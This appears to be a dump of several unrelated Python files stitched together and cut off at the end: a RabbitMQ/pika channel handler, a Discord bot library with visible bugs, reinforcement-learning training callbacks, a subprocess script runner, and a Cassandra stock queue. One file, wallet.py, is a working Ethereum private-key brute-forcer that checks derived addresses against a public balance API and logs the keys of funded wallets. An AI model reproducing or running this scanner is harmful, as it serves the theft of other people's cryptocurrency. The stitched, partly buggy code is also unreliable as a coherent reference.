LOG.debug('closing RPC pika channel for %s', self._application)
if self._channel is not None:
self._channel.close()
def _add_on_channel_close_callback(self):
LOG.debug('adding RPC pika channel close callback for %s', self._application)
self._channel.add_on_close_callback(self._on_channel_closed)
def _on_channel_closed(self, channel, reply_code, reply_text):
LOG.warning('RPC pika channel for %s was closed: %s , %s',
self._application,
str(reply_code),
str(reply_text))
# when declare exchange failed, will get error like this :
# replay_code = 406 ,
# reply_text = PRECONDITION_FAILED - inequivalent arg 'auto_delete' for
# exchange 'pf9-changes' in vhost '/': received 'false'
# but current is 'true'
if reply_code == 406:
pattern = re.compile(r".*inequivalent arg 'auto_delete' for exchange.*in vhost.*:.*received '(?P<local>\w+)' but current is '(?P<remote>\w+)'.*")
matched = re.match(pattern, reply_text)
if matched:
local = bool(matched.group('local'))
remote = bool(matched.group('remote'))
LOG.debug("'auto_delete' for exchange %s on rabbitmq server "
"is '%s', but we declared it with '%s'",
self._exchange, str(remote), str(local))
if remote != self._exchange_auto_delete:
LOG.debug('retry exchange declaration with auto_delete as '
'%s',str(self._exchange_auto_delete))
time.sleep(5)
self._setup_exchange()
return
if not self._closing:
LOG.debug('close RPC pika connection for %s since channel was closed', self._application)
self._connection.close()
else:
LOG.debug('RPC pika connection for %s already closed when channel was closed ? %s',
self._application, str(self._connection.is_closed))
def _on_channel_open(self, channel):
LOG.debug('RPC pika channel has opened for %s', self._application)
self._channel = channel
self._add_on_channel_close_callback()
# once channel is created, both producer and consumer need to declare
# exchange
self._setup_exchange()
def _setup_exchange(self):
LOG.debug('RPC pika channel is declaring exchange %s for %s', self._exchange, self._application)
try:
self._channel.exchange_declare(self._on_exchange_declare_ok,
exchange=self._exchange,
exchange_type=self._exchange_type,
auto_delete=self._exchange_auto_delete)
except Exception:
LOG.exception('unhandled exchange declaration exception for %s', self._application)
def _on_exchange_declare_ok(self, unused_frame):
LOG.debug('RPC pika channel exchange declared for %s', self._application)
try:
# call the callback if exists
if self._connection_ready_callback:
self._connection_ready_callback()
except Exception:
LOG.exception('unhandled exception from connection_ready_callback for %s', self._application)
self._connection_ready = True
def _run(self):
LOG.debug('RPC pika channel ioloop thread started for %s', self._application)
interval_seconds = 5
while not self._stopping:
if self._connection:
self._connection.close()
self._connection = None
time.sleep(interval_seconds)
try:
self._connection = self._open_connection()
self._connection.ioloop.start()
except Exception :
LOG.exception('unhandled RPC pika connection ioloop exception for %s', self._application)
LOG.debug('restart RPC pika connection for %s in %s seconds', self._application, str(interval_seconds))
self._connection.ioloop.stop()
self._close_connection()
LOG.debug('will restart RPC pika connection and ioloop for %s in %s seconds', self._application, str(interval_seconds))
time.sleep(interval_seconds)
LOG.debug('RPC pika channel IOLoop thread stopped for %s', self._application)
def is_channel_ready(self):
return self._connection_ready
def start(self):
LOG.debug('starting RPC pika channel for %s', self._application)
self._ioloop_thread = threading.Thread(name='RPCPikaIoloop', target=self._run)
self._ioloop_thread.start()
# wait for connection ready, or timeout
timeout_seconds = 120
ready = True
timeout = datetime.timedelta(seconds=timeout_seconds)
time_start = datetime.datetime.utcnow()
while not self.is_channel_ready():
time.sleep(.100)
if datetime.datetime.utcnow() - time_start > timeout:
ready = False
break
if ready:
LOG.info('RPC pika channel started for %s', self._application)
else:
LOG.warning('RPC pika channel for %s has not started in %s seconds',
self._application, str(timeout_seconds))
def stop(self):
LOG.debug('stopping RPC pika channel for %s', self._application)
self._stopping = True
self._closing = True
if self._ioloop_thread:
self._ioloop_thread.join(.100)
self._ioloop_thread = None
try:
# call the callback if exists
if self._connection_close_callback:
self._connection_close_callback()
except Exception:
LOG.exception('unhandled exception from connection_ready_callback for %s', self._application)
self.close_channel()
self._close_connection()
self._connection_ready = False
LOG.debug('RPC pika channel stopped for %s', self._application)
def get_connection(self):
return self._connection
def get_channel(self):
return self._channel
def add_connection_ready_callback(self, callback):
if not callback or not callable(callback):
raise Exception('callback is null or not callable method')
self._connection_ready_callback = callback
def add_connection_close_callback(self, callback):
if not callback or not callable(callback):
raise Exception('callback is null or not callable method')
self._connection_close_callback = callback
def restart(self):
if self._connection:
self._connection.ioloop.stop()
|
SimpleDiscord.py
|
import os
import json
import urllib3
from threading import Thread
import signal
import websocket
import time
#import zlib
from enum import IntEnum
from dataclasses import dataclass
#import io
import re
from simplediscord.utils import mylogger
# Discord opcodes
class Op_Code(IntEnum):
DISPATCH = 0
HEARTBEAT = 1
IDENTIFY = 2
UPDATE_CLIENT_PRESENCE = 3
VOICE_STATE_UPDATE = 4
RESUME_SESSION = 6
RECONNECT = 7
GUILD_MEMBERS = 8
INVALID_SESSION = 9
HELLO = 10
HEARTBEAT_ACK = 11
# Discord close events
# Discord closes connection or sends invalid codes.
class Close_Event(IntEnum):
UNKNOWN = 4000
UNKNOWN_OPCODE = 4001
DECODE_ERROR = 4002
NOT_AUTHENTICATED = 4003
AUTHENTICATION_FAILED = 4004
ALREADY_AUTHENTICATED = 4005
INVALID_SEQ = 4007
RATE_LIMITED = 4008
SESSION_TIMED_OUT = 4009
INVALID_SHARD = 4010
SHARDING_REQUIRED = 4011
INVALID_API_VERSION = 4012
INVALID_INTENTS = 4013
DISALLOWED_INTENTS = 4014
Intents_Token = {
"GUILDS" : 1,
"GUILD_MEMBERS" : 2,
"GUILD_BANS" : 4,
"GUILD_EMOJIS_AND_STICKERS" : 8,
"GUILD_INTEGRATIONS" : 16,
"GUILD_WEBHOOKS" : 32,
"GUILD_INVITES" : 64,
"GUILD_VOICE_STATES" : 128,
"GUILD_PRESENCES" : 256,
"GUILD_MESSAGES" : 512,
"GUILD_MESSAGE_REACTIONS" : 1024,
"GUILD_MESSAGE_TYPING" : 2048,
"DIRECT_MESSAGES" : 4096,
"DIRECT_MESSAGE_REACTIONS" : 8192,
"DIRECT_MESSAGE_TYPING" : 16384,
"GUILD_SCHEDULED_EVENTS" : 32768
}
_http = urllib3.PoolManager()
_token = None
_guild = None
_api = None
LOGGER_FATAL = mylogger.FATAL
LOGGER_WARNING = mylogger.WARNING
LOGGER_INFO = mylogger.INFO
LOGGER_DEBUG = mylogger.DEBUG
def Set_logger_level(level):
mylogger.level = level
@dataclass
class Connection:
ws = None
wss = None
interval = None
identified = False
_loop_heartbeat = True
_ack_heartbeat = None
commands = {}
intents_flag = 0
bot_name = None
banned_words = {}
banned_words_reaction = {}
def _Interrupt(signal, frame):
_loop_heartbeat = False
data = {"op": 1000}
Connection.ws.send(json.dumps(data))
Connection.ws.close()
os._exit(0)
def _Resume(seq):
# ws.run_forever() already tries to reconnect if a connection was closed,
# so all we need is to send to the discord server is that we want to resume.
data = {
"op": int(Op_Code.RESUME_SESSION),
"d": {
"token": _token,
"session_id": Connection.session_id,
"seq": seq
}
}
Connection.ws.send(json.loads(data))
def _Reconnect():
# Close connection with a non-zero status code.
Connection.ws.close(status=1001)
Connection.ws = None
Connection.interval = None
Connection.identified = False
global _loop_heartbeat
global _ack_heartbeat
_loop_heartbeat = False
_ack_heartbeat = None
_Connect()
def _RequestHTTP(method, url, data=None):
headers = {
"Content-Type": "application/json",
"Authorization": _token
}
mylogger.debug("request called")
if data is not None:
mylogger.debug(f"data not None")
data_encoded = json.dumps(data)
mylogger.debug(f"data encoded {data}")
resp = _http.request(
method,
url,
headers=headers,
body=data_encoded)
return resp
else:
resp = _http.request(
method,
url,
headers=headers)
return resp
def Register(name, description, message=None, command_type=1, url=None):
mylogger.debug(url)
if url == None:
url = f"https://discord.com/api/v9/applications/{_api}/guilds/{_guild}/commands"
headers = {
"Authorization": _token,
"Content-Type": "application/json"
}
# Command with options and choices.
if type(description) == list:
data = {
"name": name[0],
"type": command_type,
"description": description[0]
}
name_index = 1
p = data
# Construct options structure.
# Only support 1 options structure for now.
for i in range(1, len(description)):
p["options"] = [{
"name": name[i],
"type": 3, # String
"description": description[i],
"required": True
}]
data = p
#p = p["options"]
name_index += 1
data["options"][0]["choices"] = []
mylogger.debug(f"{data=}")
j = 0
for i in range(name_index, len(name)):
data["options"][0]["choices"].append({})
data["options"][0]["choices"][j]["name"] = name[i]
data["options"][0]["choices"][j]["value"] = message[j]
j += 1
mylogger.debug(f"{data=}")
# Standard slash command.
else:
data = {
"name": name,
"type": command_type,
"description": description
}
data_encoded = json.dumps(data)
resp = _http.request(
"POST",
url,
headers=headers,
body=data_encoded)
resp.auto_close = False
if resp.status == 200 or resp.status == 201:
mylogger.debug(f"Successfully Registered bot command: {name}")
mylogger.debug(resp.data)
#for line in io.TextIOWrapper(resp):
# mylogger.debug(line)
#for k,v in resp.headers.items():
# mylogger.debug(f"{k}: {v}")
else:
mylogger.debug(resp.status, resp.reason)
#for line in io.TextIOWrapper(resp):
# mylogger.debug(line)
#for k,v in resp.headers.items():
# mylogger.debug(f"{k}: {v}")
def Slash_commands(url=None):
if url == None:
url = f"https://discord.com/api/v9/applications/{_api}/guilds/{_guild}/commands"
headers = {
"Authorization": _token,
"Content-Type": "application/json"
}
resp = _http.request(
"GET",
url,
headers=headers)
resp.auto_close = False
if resp.status == 200 or resp.status == 304:
mylogger.debug("Registered bot commands:")
mylogger.debug(resp.data)
#for k,v in resp.headers.items():
# mylogger.debug(f"{k}: {v}")
else:
mylogger.debug(resp.status, resp.reason)
#for line in io.TextIOWrapper(resp):
# mylogger.debug(line)
#for k,v in resp.headers.items():
# mylogger.debug(f"{k}: {v}")
def Change_username(username):
url = "https://discord.com/api/users/@me"
data = {
"username": username
}
resp = _RequestHTTP("PATCH", url, data)
if resp.status != 200:
mylogger.debug(resp.status, resp.reason)
mylogger.debug(resp.status, resp.reason)
# The bot will delete a message containing word(s) from the dictionary in a channel, and warn the user.
# File syntax is as follows:
# Uppercase for specifying a language.
# Lowercase adjacent to the language for words.
def Filter(file):
try:
with open(file, "r", encoding="utf-8") as f:
lang = None
for line in f:
if line[0].isupper():
lang = line.strip()
elif lang is not None and line != "\n":
if lang not in banned_words:
banned_words[lang] = [line.strip()]
else:
banned_words[lang].append(line.strip())
except FileNotFoundError:
mylogger.warning("Could not find file " + file)
def _Event_handler(ws, op_code, seq, message):
global _ack_heartbeat
if op_code == Op_Code.HEARTBEAT:
mylogger.debug("Send heartbeat")
data = {
"op": int(Op_Code.HEARTBEAT),
"d": seq
}
ws.send(json.dumps(data))
elif op_code == Op_Code.HEARTBEAT_ACK:
mylogger.debug("ACK heartbeat")
_ack_heartbeat = True
elif op_code == Op_Code.DISPATCH:
pass
mylogger.debug("Message dispatched")
elif op_code == Op_Code.RECONNECT:
_Reconnect()
elif op_code == Op_Code.INVALID_SESSION:
# Discord sends this op code if it's down, so according to the docs I should continue to heartbeat.
# This could be ambiguous and thus behave incorrectly.
mylogger.fatal("Discord is down, waiting untill it's up...")
_ack_heartbeat = True
elif op_code == Op_Code.HELLO:
mylogger.debug("Got a hello request")
def Send_heartbeat(ws, _loop_heartbeat):
while _loop_heartbeat is True:
global _ack_heartbeat
if _ack_heartbeat is None or _ack_heartbeat is True:
# Only check for ack of heartbeat if connection is established which includes sending a heartbeat once.
if _ack_heartbeat is True:
_ack_heartbeat = False
mylogger.debug("Send heartbeat interval")
data = {
"op": int(Op_Code.HEARTBEAT),
"d": seq
}
# Wait based on the interval before requesting to discord api
time.sleep(Connection.interval)
ws.send(json.dumps(data))
# Zombied or failed connection.
else:
_Reconnect()
Thread(target=Send_heartbeat, args=(ws, _loop_heartbeat)).start()
# Error messages according to Discord's api docs.
elif op_code == Close_Event.UNKNOWN:
mylogger.fatal("We're not sure what went wrong. Trying to reconnect...")
_Resume(ws, seq)
elif op_code == Close_Event.UNKNOWN_OPCODE:
mylogger.fatal("You sent an invalid Gateway opcode or an invalid payload for an opcode. Don't do that!")
os._exit(0)
elif op_code == Close_Event.DECODE_ERROR:
mylogger.fatal("You sent an invalid payload to us. Don't do that!")
os._exit(0)
elif op_code == Close_Event.NOT_AUTHENTICATED:
mylogger.fatal("You sent us a payload prior to identifying.")
os._exit(0)
elif op_code == Close_Event.AUTHENTICATION_FAILED:
mylogger.fatal("You sent an invalid payload to us. Don't do that!")
os._exit(0)
elif op_code == Close_Event.ALREADY_AUTHENTICATED:
mylogger.fatal("You sent more than one identify payload. Don't do that!")
os._exit(0)
elif op_code == Close_Event.INVALID_SEQ:
mylogger.fatal("The account token sent with your identify payload is incorrect.")
os._exit(0)
elif op_code == Close_Event.RATE_LIMITED:
mylogger.fatal("Woah nelly! You're sending payloads to us too quickly. Slow it down! You will be disconnected on receiving this.")
os._exit(0)
elif op_code == Close_Event.SESSION_TIMED_OUT:
mylogger.fatal("Your session timed out. Reconnect and start a new one.")
os._exit(0)
elif op_code == Close_Event.INVALID_SHARD:
mylogger.fatal(" You sent us an invalid shard when identifying.")
os._exit(0)
elif op_code == Close_Event.SHARDING_REQUIRED:
mylogger.fatal("The session would have handled too many guilds - you are required to shard your connection in order to connect.")
os._exit(0)
elif op_code == Close_Event.INVALID_API_VERSION:
mylogger.fatal("You sent an invalid version for the gateway.")
os._exit(0)
elif op_code == Close_Event.INVALID_INTENTS:
mylogger.fatal("You sent an invalid intent for a Gateway Intent. You may have incorrectly calculated the bitwise value.")
os._exit(0)
elif op_code == Close_Event.DISALLOWED_INTENTS:
mylogger.fatal("You sent a disallowed intent for a Gateway Intent. You may have tried to specify an intent that you have not enabled or are not approved for.")
os._exit(0)
def _Identify(ws):
data = {
"op": int(Op_Code.IDENTIFY),
"d": {
"token": _token,
"intents": intents_flag,
"properties": {
"$os": "windows",
"$browser": "fun",
"$device": "fun"
}
}
}
ws.send(json.dumps(data))
def _Interactions(message):
username = message["d"]["member"]["user"]["username"]
message_name = message["d"]["data"]["name"]
interaction_token = message["d"]["token"]
interaction_id = message["d"]["id"]
mylogger.debug(f"username: {username}")
url = f"https://discord.com/api/v9/interactions/{interaction_id}/{interaction_token}/callback"
mylogger.debug(message["d"]["data"]["name"])
http_resp = None
for k,v in commands.items():
if message_name == k:
mylogger.debug(f"{k=} {v=}")
if type(v) == list:
if len(v[0]) >= 4:
if v[0][0:4] == "func":
# Call the user-defined function with the message value as arguments or no arguments if @value is not defined.
ret = v[1]((v[0][4::].replace("@value", message["d"]["data"]["options"][0]["value"])))
data = {
"type": 4,
"data": {
"content": ret
}
}
else:
mylogger.fatal("Command[0] does not contain func keyword.")
break
else:
mylogger.fatal("Command[0] must contain func keyword.")
break
else:
data = {
"type": 4,
"data": {
"content": v.replace("@username", username)
}
}
mylogger.debug(f"data {data}")
http_resp = _RequestHTTP("POST", url, data)
mylogger.debug(http_resp.data)
break
if http_resp == None:
mylogger.warning("Command has not been registered.")
# This function checks the message content as opposed to its name.
# This will become a privilige in April of 2022 for bots that are in more than 75 servers.
# Note: GUILD_MESSAGES intents needs to be specified when identifying to trigger this function.
def _Message_content(message):
channel_id = message["d"]["channel_id"]
username = message["d"]["author"]["username"]
content = message["d"]["content"]
message_id = message["d"]["id"]
mylogger.debug(f"username: {username}")
mylogger.debug(f"channel_id: {channel_id}")
mylogger.debug(f"content: {content}")
url = f"https://discord.com/api/v9/channels/{channel_id}/messages"
url_delete = f"https://discord.com/api/v9/channels/{channel_id}/messages/{message_id}"
data = None
for k,v in banned_words.items():
for word in v:
# Very naive checker.
if re.search(word, content.lower()):
mylogger.debug("bad word found")
mylogger.debug(f"language: {k}")
if k in banned_words_reaction:
data = {
"content": banned_words_reaction[k]
}
else:
mylogger.warning(f"Found {k} bad word, but no reaction defined.")
break
if data is not None:
http_resp = _RequestHTTP("POST", url, data)
mylogger.debug(http_resp.data)
http_resp = _RequestHTTP("DELETE", url_delete)
mylogger.debug(http_resp.data)
def _On_message(ws, message):
mylogger.debug(ws)
message_d = json.loads(message)
mylogger.debug(f"message: {message_d}")
if message_d["t"] == "READY":
global bot_name
bot_name = message_d["d"]["user"]["username"]
elif message_d["t"] == "INTERACTION_CREATE":
Thread(target=_Interactions, args=(message_d,)).start()
elif message_d["t"] == "MESSAGE_CREATE" and message_d["d"]["author"]["username"] != bot_name:
Thread(target=_Message_content, args=(message_d,)).start()
else:
op_code = None
seq = message_d["s"]
if Connection.interval is None:
if message_d["d"] is not None or message_d["d"] is not False and "heartbeat_interval" in message["d"]:
Connection.interval = int((message_d["d"]["heartbeat_interval"]) / 1000)
mylogger.debug(f"interval: {Connection.interval}")
mylogger.debug(f"seq {seq}")
# Op code will most likely always be in the response.
op_code = message_d["op"]
mylogger.debug(f"op code: {op_code}")
_Event_handler(ws, op_code, seq, message)
if Connection.identified is False:
_Identify(ws)
Connection.identified = True
Connection.id = message_d["d"]["session_id"]
def _On_open(ws):
mylogger.info("Connected")
mylogger.debug(f"gateway {Connection.wss}\n")
# Error gets fired even though no errors have been found,
# I assume this bug is due to executing the websocket.forever function in a different thread.
def _On_error(ws, error):
pass
def _On_close(ws, close_status_code, close_msg):
mylogger.info("\nConnection closed")
mylogger.debug(f"Status: {close_status_code}")
mylogger.debug(f"Close message: {close_msg}\n")
os._exit(0)
def _Connect():
if Connection.wss is None:
# Create a file if gateway is not already cached
if os.path.isfile("url.txt") is False:
mylogger.debug("Gateway is not cached yet")
url = "https://discord.com/api/v9/gateway/bot"
resp = _RequestHTTP("GET", url)
Connection.wss = ((json.loads(resp.data)["url"]) + "?v=9&encoding=json")
with open("url.txt", "w") as f:
f.write(Connection.wss)
else:
mylogger.debug("Got the cached gateway")
with open("url.txt", "r") as f:
Connection.wss = f.readline().strip("\n")
Connection.ws = websocket.WebSocketApp(Connection.wss, on_message=_On_message, on_error=_On_error,
on_close=_On_close, on_open=_On_open)
Connection.ws.run_forever()
def Connect(token, api, guild=None, intents=None):
#websocket.enableTrace(True)
if token is not None or api is not None:
global _token
global _api
global _guild
_token = token
_api = api
_guild = guild
global intents_flag
if type(intents) == list:
for n in intents:
if n in Intents_Token:
intents_flag += Intents_Token[n]
elif intents is not None:
mylogger.fatal("Intents must be an array.")
os._exit(0)
if intents_flag == 0:
# Intents is required upon identifying, so the default is GUILDS.
intents_flag = 1
mylogger.debug(f"{intents_flag=}")
Thread(target=_Connect, daemon=True).start()
else:
mylogger.fatal("Token and api key are required.")
os._exit(0)
def _Keep_alive():
signal.signal(signal.SIGINT, _Interrupt)
# We need this keep the main thread alive, since python only executes 1 thread at a time due to the global interperter lock,
# to stop the program immediately on pressing CTRL + C.
while True:
pass
# Entry point to all bot applications, this function is required to keep the program running execute user defined functions.
def Main(func):
if _token is not None or _api is not None:
def wrapper(*args, **kwargs):
# Bug-fatal: calling this too many times could cause a too many request error,
# and having this error too many times causes your token to be revoked; thus your bot disabled.
func()
return wrapper(), _Keep_alive()
else:
mylogger.fatal("You are not connected.")
|
wallet.py
|
import threading
import os
import time
import random
import codecs
import requests
import json
from ecdsa import SigningKey, SECP256k1
import sha3
import traceback
maxPage = pow(2,256) / 128
def getRandPage():
return random.randint(1, maxPage)
def getPage(pageNum):
keyList = []
addrList = []
addrStr = ""
num = (pageNum - 1) * 50 + 1
try:
for i in range(num, num + 50):
key = hex(i)[2:]
if len(key) < 64: key = "0"*(64-len(key)) + key
priv = codecs.decode(key, 'hex_codec')
pub = SigningKey.from_string(priv, curve=SECP256k1).get_verifying_key().to_string()
addr = "0x" + sha3.keccak_256(pub).hexdigest()[24:]
keyList.append(key)
addrList.append(addr)
if len(addrStr): addrStr = addrStr + ","
addrStr = addrStr + addr
except:
pass
return [keyList, addrList, addrStr]
def getBalances(addrStr):
balances = ""
try:
r = requests.get(url='https://etherchain.org/api/account/multiple/%s' % addrStr, timeout=5)
balances = r.text
except:
return
try:
balances = json.loads(balances)
if balances['status'] != 1: raise Exception("API Busy")
balances = balances['data']
except:
print (balances)
return balances
getCount = 0
fp_found = open("found.txt", "w+")
fp_fund = open("fund.txt", "w+")
def getWallet():
global getCount
while True:
page = getRandPage()
pageRet = getPage(page)
getCount = getCount + len(pageRet[1])
try:
balancesRet = getBalances(pageRet[2])
for balance in balancesRet:
key = ""
for i in range(0, len(pageRet[1])):
if balance['address'] == pageRet[1][i]:
key = pageRet[0][i]
break
if key == "": continue
fp_found.write(str(balance['balance']) + " " + key + " " + balance['address'] + "\n")
if balance['balance'] > 0:
fp_fund.write(str(balance['balance']) + " " + key + " " + balance['address'] + "\n")
#print (balance['balance'], key, balance['address'])
fp_found.flush()
fp_fund.flush()
except:
traceback.print_exc()
continue
clearScreen()
print (getCount)
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet,args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
callbacks.py
|
import os
import tempfile
import time
from copy import deepcopy
from functools import wraps
from threading import Thread
from typing import Optional
import optuna
from sb3_contrib import TQC
from stable_baselines3 import SAC
from stable_baselines3.common.callbacks import BaseCallback, EvalCallback
from stable_baselines3.common.logger import TensorBoardOutputFormat
from stable_baselines3.common.vec_env import VecEnv
class TrialEvalCallback(EvalCallback):
"""
Callback used for evaluating and reporting a trial.
"""
def __init__(
self,
eval_env: VecEnv,
trial: optuna.Trial,
n_eval_episodes: int = 5,
eval_freq: int = 10000,
deterministic: bool = True,
verbose: int = 0,
best_model_save_path: Optional[str] = None,
log_path: Optional[str] = None,
):
super().__init__(
eval_env=eval_env,
n_eval_episodes=n_eval_episodes,
eval_freq=eval_freq,
deterministic=deterministic,
verbose=verbose,
best_model_save_path=best_model_save_path,
log_path=log_path,
)
self.trial = trial
self.eval_idx = 0
self.is_pruned = False
def _on_step(self) -> bool:
if self.eval_freq > 0 and self.n_calls % self.eval_freq == 0:
super()._on_step()
self.eval_idx += 1
# report best or report current ?
# report num_timesteps or elasped time ?
self.trial.report(self.last_mean_reward, self.eval_idx)
# Prune trial if need
if self.trial.should_prune():
self.is_pruned = True
return False
return True
class SaveVecNormalizeCallback(BaseCallback):
"""
Callback for saving a VecNormalize wrapper every ``save_freq`` steps
:param save_freq: (int)
:param save_path: (str) Path to the folder where ``VecNormalize`` will be saved, as ``vecnormalize.pkl``
:param name_prefix: (str) Common prefix to the saved ``VecNormalize``, if None (default)
only one file will be kept.
"""
def __init__(self, save_freq: int, save_path: str, name_prefix: Optional[str] = None, verbose: int = 0):
super().__init__(verbose)
self.save_freq = save_freq
self.save_path = save_path
self.name_prefix = name_prefix
def _init_callback(self) -> None:
# Create folder if needed
if self.save_path is not None:
os.makedirs(self.save_path, exist_ok=True)
def _on_step(self) -> bool:
if self.n_calls % self.save_freq == 0:
if self.name_prefix is not None:
path = os.path.join(self.save_path, f"{self.name_prefix}_{self.num_timesteps}_steps.pkl")
else:
path = os.path.join(self.save_path, "vecnormalize.pkl")
if self.model.get_vec_normalize_env() is not None:
self.model.get_vec_normalize_env().save(path)
if self.verbose > 1:
print(f"Saving VecNormalize to {path}")
return True
class ParallelTrainCallback(BaseCallback):
"""
Callback to explore (collect experience) and train (do gradient steps)
at the same time using two separate threads.
Normally used with off-policy algorithms and `train_freq=(1, "episode")`.
TODO:
- blocking mode: wait for the model to finish updating the policy before collecting new experience
at the end of a rollout
- force sync mode: stop training to update to the latest policy for collecting
new experience
:param gradient_steps: Number of gradient steps to do before
sending the new policy
:param verbose: Verbosity level
:param sleep_time: Limit the fps in the thread collecting experience.
"""
def __init__(self, gradient_steps: int = 100, verbose: int = 0, sleep_time: float = 0.0):
super().__init__(verbose)
self.batch_size = 0
self._model_ready = True
self._model = None
self.gradient_steps = gradient_steps
self.process = None
self.model_class = None
self.sleep_time = sleep_time
def _init_callback(self) -> None:
temp_file = tempfile.TemporaryFile()
# Windows TemporaryFile is not a io Buffer
# we save the model in the logs/ folder
if os.name == "nt":
temp_file = os.path.join("logs", "model_tmp.zip")
self.model.save(temp_file)
# TODO: add support for other algorithms
for model_class in [SAC, TQC]:
if isinstance(self.model, model_class):
self.model_class = model_class
break
assert self.model_class is not None, f"{self.model} is not supported for parallel training"
self._model = self.model_class.load(temp_file)
self.batch_size = self._model.batch_size
# Disable train method
def patch_train(function):
@wraps(function)
def wrapper(*args, **kwargs):
return
return wrapper
# Add logger for parallel training
self._model.set_logger(self.model.logger)
self.model.train = patch_train(self.model.train)
# Hack: Re-add correct values at save time
def patch_save(function):
@wraps(function)
def wrapper(*args, **kwargs):
return self._model.save(*args, **kwargs)
return wrapper
self.model.save = patch_save(self.model.save)
def train(self) -> None:
self._model_ready = False
self.process = Thread(target=self._train_thread, daemon=True)
self.process.start()
def _train_thread(self) -> None:
self._model.train(gradient_steps=self.gradient_steps, batch_size=self.batch_size)
self._model_ready = True
def _on_step(self) -> bool:
if self.sleep_time > 0:
time.sleep(self.sleep_time)
return True
def _on_rollout_end(self) -> None:
if self._model_ready:
self._model.replay_buffer = deepcopy(self.model.replay_buffer)
self.model.set_parameters(deepcopy(self._model.get_parameters()))
self.model.actor = self.model.policy.actor
if self.num_timesteps >= self._model.learning_starts:
self.train()
# Do not wait for the training loop to finish
# self.process.join()
def _on_training_end(self) -> None:
# Wait for the thread to terminate
if self.process is not None:
if self.verbose > 0:
print("Waiting for training thread to terminate")
self.process.join()
class RawStatisticsCallback(BaseCallback):
"""
Callback used for logging raw episode data (return and episode length).
"""
def __init__(self, verbose=0):
super().__init__(verbose)
# Custom counter to reports stats
# (and avoid reporting multiple values for the same step)
self._timesteps_counter = 0
self._tensorboard_writer = None
def _init_callback(self) -> None:
# Retrieve tensorboard writer to not flood the logger output
for out_format in self.logger.output_formats:
if isinstance(out_format, TensorBoardOutputFormat):
self._tensorboard_writer = out_format
assert self._tensorboard_writer is not None, "You must activate tensorboard logging when using RawStatisticsCallback"
def _on_step(self) -> bool:
for info in self.locals["infos"]:
if "episode" in info:
logger_dict = {
"raw/rollouts/episodic_return": info["episode"]["r"],
"raw/rollouts/episodic_length": info["episode"]["l"],
}
exclude_dict = {key: None for key in logger_dict.keys()}
self._timesteps_counter += info["episode"]["l"]
self._tensorboard_writer.write(logger_dict, exclude_dict, self._timesteps_counter)
return True
|
pyscriptrunner.py
|
from subprocess import Popen, PIPE
from threading import Thread
from Queue import Queue, Empty
from multiprocessing.pool import ThreadPool
import os
import tempfile
import sys
import atexit
# Queue to keep track of stdout
io_q = Queue()
result = Queue()
def stream_watcher(identifier, stream):
for line in stream:
io_q.put((identifier, line))
result.put((identifier, line))
if not stream.closed:
stream.close()
def runprocess(code):
# declare global Popen object
global proc
global stdout_list
stdout_list = list()
# make a tmp file
f = tempfile.NamedTemporaryFile(suffix='.py', prefix='sample', delete=False)
# script.py is the name of the code passed in
f.write(code)
proc = Popen(['python', f.name], stdout=PIPE, stderr=PIPE)
Thread(target=stream_watcher, name='stdout-watcher',
args=('STDOUT', proc.stdout)).start()
Thread(target=stream_watcher, name='stderr-watcher',
args=('STDERR', proc.stderr)).start()
#Thread(target=printer, name='printer').start()
# for killing the process but not necessary for now
#atexit.register(proc.kill)
f.close()
'''
while True:
try:
stdout_list.append(result.get(True, 1))
except Empty:
break
return stdout_list
'''
return result
def printer():
# save stdout & stdin in list
while True:
try:
# Block for 1 second.
item = io_q.get(True, 1)
#print item[0] + ':' + item[1].strip('\n')
#print item
except Empty:
# No output in either streams for a second. Are we done? yes
if proc.poll() is not None:
break
else:
identifier, line = item
#print identifier + ':', line
#print stdout_list
'''
if __name__ == '__main__':
code =
print "hello"
print 1+2
M
print runprocess(code)
'''
|
Stock_source_utils.py
|
from collections import deque
from datetime import datetime
from cassandra import ConsistencyLevel
from cassandra.query import BatchStatement
from threading import Event, Thread, Timer
import time
import json
class StockDataQueue:
def __init__(self, stock_symbol, interval_type, length, c_session):
self.queue = deque()
self.length = length
self.c_session = c_session
self.interval_type = interval_type
if self.interval_type == 'sec':
self.interval = 1
elif self.interval_type == 'min':
self.interval = 60
elif self.interval_type == 'hr':
self.interval = 3600
self.H = {}
self.L = {}
for symbol in stock_symbol:
self.H[symbol] = 0
self.L[symbol] = float('inf')
def __InsertCassandraStock(self):
# symbol: str -> text, OHLC: dict (json) -> text, interval_type: str -> text, ts: datetime -> timestamp
return self.c_session.prepare(
'INSERT INTO stocks_history (OHLC,symbol,interval_type, ts) VALUES (?, ?, ?, ?)'
)
def __UpdateCassandraStock(self):
return self.c_session.prepare(
'UPDATE stocks_history SET OHLC =? WHERE symbol=? AND interval_type=? AND ts=?'
)
# Deleting data from Cassandra table
def __DeleteCassandraStock(self):
return self.c_session.prepare(
'DELETE FROM stocks_history WHERE symbol=? AND interval_type=? AND ts=?'
)
def push(self, OHLCs, timestamp):
# Sometimes there will be missing timestamp in the queue, it is caused by overmuch time consumed when asking stock data from IEX API, so the later data retriever write data earlier than the earlier data retriever
# So when there's a missing value, we will supplement it with the duplicate of the current value
# Later when the program which is responsible for this timestamp starts to write data, it will update the previous supplemented value
# In other situation if the time consumed is longer than the set interval, it will force the data retriever to skip one round of data retrieval
# In that case the supplemented data won't be update and will be just the same as the descendent
# There are 4 situations that could happen at the moment when the data is about to be pushed into the queue
# 1. the latest timestamp is exactly 1 second before the current timestamp, then we can append our current data to the end of the queue
# 2. the lastest timestamp is earlier than the current timestamp more than 1 second but not more than 10 seconds. In this case we duplicate the current data and supplement the missing value
# 3. the latest timestamp is bigger than the current timestamp.
# In this case, we pop out all the data which is later than the current timestamp until we found a timestamp which is less than or equal to the current timestamp, and see now it belongs to situation 1 or situation 2
# 4. large difference between current timestamp and the last timestamp. It indicate the current one is the beginning of a new day, so just append it to the end of the queue
# The above analysis is only for the problem in retrieving data every second. Introducing interval into the code can generalize it for every minute data and every hour data
# unit of timestamp is second
stack = []
while self.queue and self.queue[-1]['timestamp'] > timestamp:
stack.append(self.queue.pop())
# An execution of a batch of operations is faster than multiple executions every single operations in a loop
batch = BatchStatement(consistency_level=ConsistencyLevel.QUORUM)
if self.queue and timestamp == self.queue[-1]['timestamp']:
# modify content of the element in the queue
self.queue[-1]['OHLCs'] = OHLCs
# update data in Cassandra table "stocks_history"
